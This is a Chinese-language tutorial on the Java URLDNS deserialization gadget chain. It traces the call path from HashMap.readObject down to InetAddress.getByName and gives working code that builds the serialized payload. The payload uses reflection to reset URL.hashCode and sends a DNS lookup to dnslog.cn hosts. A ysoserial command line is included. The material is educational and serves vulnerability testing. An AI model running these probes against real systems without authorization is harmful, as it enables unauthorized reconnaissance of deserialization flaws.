[Java反序列化]—URLDNS链

前言

URLDNS链不能执行命令，但通常作为验证是否存在反序列化漏洞的一种方式，学习反序列化应先从URLDNS说起，因为它链子短、易理解。

ysoserial

再谈URLDNS前，一定要说的一个工具ysoserial,ysoserial集合了各种java反序列化payload,可以说是Java反序列化的一个里程碑

工具使用

ysoserial 源码

ysoserial.jar

ysoserial.jar

java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'

URLDNS

java -jar ysoserial-0.0.4.jar URLDNS "http://4tfewq.dnslog.cn" >1.txt

运行后便生成1.txt，经过反序列化后就可以看到DNS请求

ysoserial 源码

IDEA配置

File—>New—>Project from Existing…

选择目录下的pom.xml即可

安装好后需要进行Maven环境变量配置

最后如下配置后便可直接运行URLDNS.java查看DNS记录了

利用链分析(URLDNS)

通过分析ysoserial的payload,可以看出这个链反序列化的对象是HashMap的对象

public class URLDNS implements ObjectPayload<Object> {

        public Object getObject(final String url) throws Exception {

                //Avoid DNS resolution during payload creation
                //Since the field <code>java.net.URL.handler</code> is transient, it will not be part of the serialized payload.
                URLStreamHandler handler = new SilentURLStreamHandler();

                HashMap ht = new HashMap(); // HashMap that will contain the URL
                URL u = new URL(null, url, handler); // URL to use as the Key
                ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

                Reflections.setFieldValue(u, "hashCode", -1); // During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.

                return ht;
        }

        public static void main(final String[] args) throws Exception {
                PayloadRunner.run(URLDNS.class, args);
        }

        /**
         * <p>This instance of URLStreamHandler is used to avoid any DNS resolution while creating the URL instance.
         * DNS resolution is used for vulnerability detection. It is important not to probe the given URL prior
         * using the serialized object.</p>
         *
         * <b>Potential false negative:</b>
         * <p>If the DNS name is resolved first from the tester computer, the targeted server might get a cache hit on the
         * second resolution.</p>
         */
        static class SilentURLStreamHandler extends URLStreamHandler {

                protected URLConnection openConnection(URL u) throws IOException {
                        return null;
                }

                protected synchronized InetAddress getHostAddress(URL u) {

                    return null;
                }
        }
}

当反序列化HashMap时便会调用其中的readObject方法

private void readObject(java.io.ObjectInputStream s)
    throws IOException, ClassNotFoundException {
    // Read in the threshold (ignored), loadfactor, and any hidden stuff
    s.defaultReadObject();
    reinitialize();
    if (loadFactor <= 0 || Float.isNaN(loadFactor))
        throw new InvalidObjectException("Illegal load factor: " +
                                         loadFactor);
    s.readInt();                // Read and ignore number of buckets
    int mappings = s.readInt(); // Read number of mappings (size)
    if (mappings < 0)
        throw new InvalidObjectException("Illegal mappings count: " +
                                         mappings);
    else if (mappings > 0) { // (if zero, use defaults)
        // Size the table using given load factor only if within
        // range of 0.25...4.0
        float lf = Math.min(Math.max(0.25f, loadFactor), 4.0f);
        float fc = (float)mappings / lf + 1.0f;
        int cap = ((fc < DEFAULT_INITIAL_CAPACITY) ?
                   DEFAULT_INITIAL_CAPACITY :
                   (fc >= MAXIMUM_CAPACITY) ?
                   MAXIMUM_CAPACITY :
                   tableSizeFor((int)fc));
        float ft = (float)cap * lf;
        threshold = ((cap < MAXIMUM_CAPACITY && ft < MAXIMUM_CAPACITY) ?
                     (int)ft : Integer.MAX_VALUE);

        // Check Map.Entry[].class since it's the nearest public type to
        // what we're actually creating.
        SharedSecrets.getJavaOISAccess().checkArray(s, Map.Entry[].class, cap);
        @SuppressWarnings({"rawtypes","unchecked"})
        Node<K,V>[] tab = (Node<K,V>[])new Node[cap];
        table = tab;

        // Read the keys and values, and put the mappings in the HashMap
        for (int i = 0; i < mappings; i++) {
            @SuppressWarnings("unchecked")
                K key = (K) s.readObject();
            @SuppressWarnings("unchecked")
                V value = (V) s.readObject();
            putVal(hash(key), key, value, false, false);
        }
    }
}

可以发现在最后的putVal(hash(key), key, value, false, false);中调用了hash方法跟进一下

调用了key类型的hashCode方法

    static final int hash(Object key) {
        int h;
        return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
    }

而在readObject方法中也可以看到key是我们调用时的键，而在ysoserial中并没有使用Object的hashCode方法，而是用到了URL类中的hashCode方法，所以这里我们就需要将key实例化成我们需要的URL类

for (int i = 0; i < mappings; i++) {
                @SuppressWarnings("unchecked")
                    K key = (K) s.readObject();
                @SuppressWarnings("unchecked")
                    V value = (V) s.readObject();
                putVal(hash(key), key, value, false, false);
            }

跟进一下URL类的hashCode方法,当hashCode的值为-1时便会执行URLStreamHandler类的hashCode方法

public synchronized int hashCode() {
    if (hashCode != -1)
        return hashCode;

    hashCode = handler.hashCode(this);
    return hashCode;
}

注：由于这里是调用的URL类的构造方法，所以这里的this便是调用URL类的构造方法，如注释中所示解析我们传入的url

跟进URLStreamHandler的hashCode方法

protected int hashCode(URL u) {
    int h = 0;

    // Generate the protocol part.
    String protocol = u.getProtocol();
    if (protocol != null)
        h += protocol.hashCode();

    // Generate the host part.
    InetAddress addr = getHostAddress(u);

跟进getHostAddress方法下边会调用getByName方法

protected synchronized InetAddress getHostAddress(URL u) {
        if (u.hostAddress != null)
            return u.hostAddress;

        String host = u.getHost();
        if (host == null || host.equals("")) {
            return null;
        } else {
            try {
                u.hostAddress = InetAddress.getByName(host);
            } catch (UnknownHostException ex) {

而该方法其实就是会对我们传入的url发起一次DNS请求

至此本条链就结束了,捋一下整条链顺序：

HashMap.readObject()->HashMap.hash()—>URL.hachCode()—>URLStreamHandler.hachCode()—>URLStreamHandler.getHostAddress()->InetAddress.getByName()

利用方式

在HashMap中有一个put方法会调用我们需要触发的hash方法

    public V put(K key, V value) {
        return putVal(hash(key), key, value, false, true);
    }

尝试用put方法触发URLDNS

import java.io.IOException;
import java.net.URL;
import java.util.HashMap;

public class DnsTest {
    public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
        HashMap<URL, Integer> hash = new HashMap<URL,Integer>();
        URL url = new URL("http://lwjabj.dnslog.cn");
        hash.put(url,1);
    }
}

成功触发

捋一下运行过程：

定义的hash是HashMap类型，所以调用hash.put时便会调用HashMap类的hash(key),之后会调用key.hashCode()方法而我们在一开始实例化的HashMap对象的键是URL类型的(HashMap<URL, Integer>),所以就会调用URL类的hashCode方法。这里Debug可以看到hashCode的值为-1，所以会执行URLStreamHandler类的hachCode()，剩下部分就如之前整理的链顺序(不再解释了)

反射修改hashCode

梳理到这里出现一个问题：我们需要在反序列化时触发URLDNS，但现在还未进行反序列化就已经执行了最后的getByName()方法

原因：如上图所示在反序列化之前这里的hashCode就已经变成了-1,而我们在反序列化之前并不想让他调用getByName即hashCode不为-1

解决办法：这种情况就需要通过我们的反射机制来修改hashCode的值，让它不为-1从而终止他的运行(反射可参考我之前的文章：一篇了解Java反射

查看hashCode属性发现其为私有属性

private int hashCode = -1;

所以这里修改值得话就用到了反射爆破—>setAccessible

import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;

public class DnsTest {
    public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
        HashMap<URL, Integer> hash = new HashMap<URL,Integer>();
        URL url = new URL("http://93rjqs.dnslog.cn");
        Class c = Class.forName("java.net.URL");
        Field hashCode = c.getDeclaredField("hashCode");
        hashCode.setAccessible(true);						//反射爆破属性
        hashCode.set(url,123);								//传参值不为-1即可
        hash.put(url,1);
        Serialize(hash);
    }
    public static void Serialize(Object obj) throws IOException {
        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream("1.txt"));
        out.writeObject(obj);
        out.close();
    }
}

此时调用后便没有返回任何结果

但这里的·hashCode·值被我们修改成了123当我们反序列化后得到的就也还是123,所以在执行完hash.put后改回去即可hashCode.set(url,1);

package Sentiment.unserialize.URLDNS;

import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;

public class DnsTest {
    public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
        HashMap<URL, Integer> hash = new HashMap<URL,Integer>();
        URL url = new URL("http://93rjqs.dnslog.cn");
        Class c = Class.forName("java.net.URL");
        Field hashCode = c.getDeclaredField("hashCode");
        hashCode.setAccessible(true);
        hashCode.set(url,123);
        hash.put(url,1);
        hashCode.set(url,-1);
        Serialize(hash);
    }
    public static void Serialize(Object obj) throws IOException {
        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream("1.txt"));
        out.writeObject(obj);
        out.close();
    }
}

执行反序列化

import java.io.FileInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;

public class Unserialize {
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        ObjectInputStream In = new ObjectInputStream(new FileInputStream("1.txt"));
        Object obj= In.readObject();
    }
}

成功返回DNS记录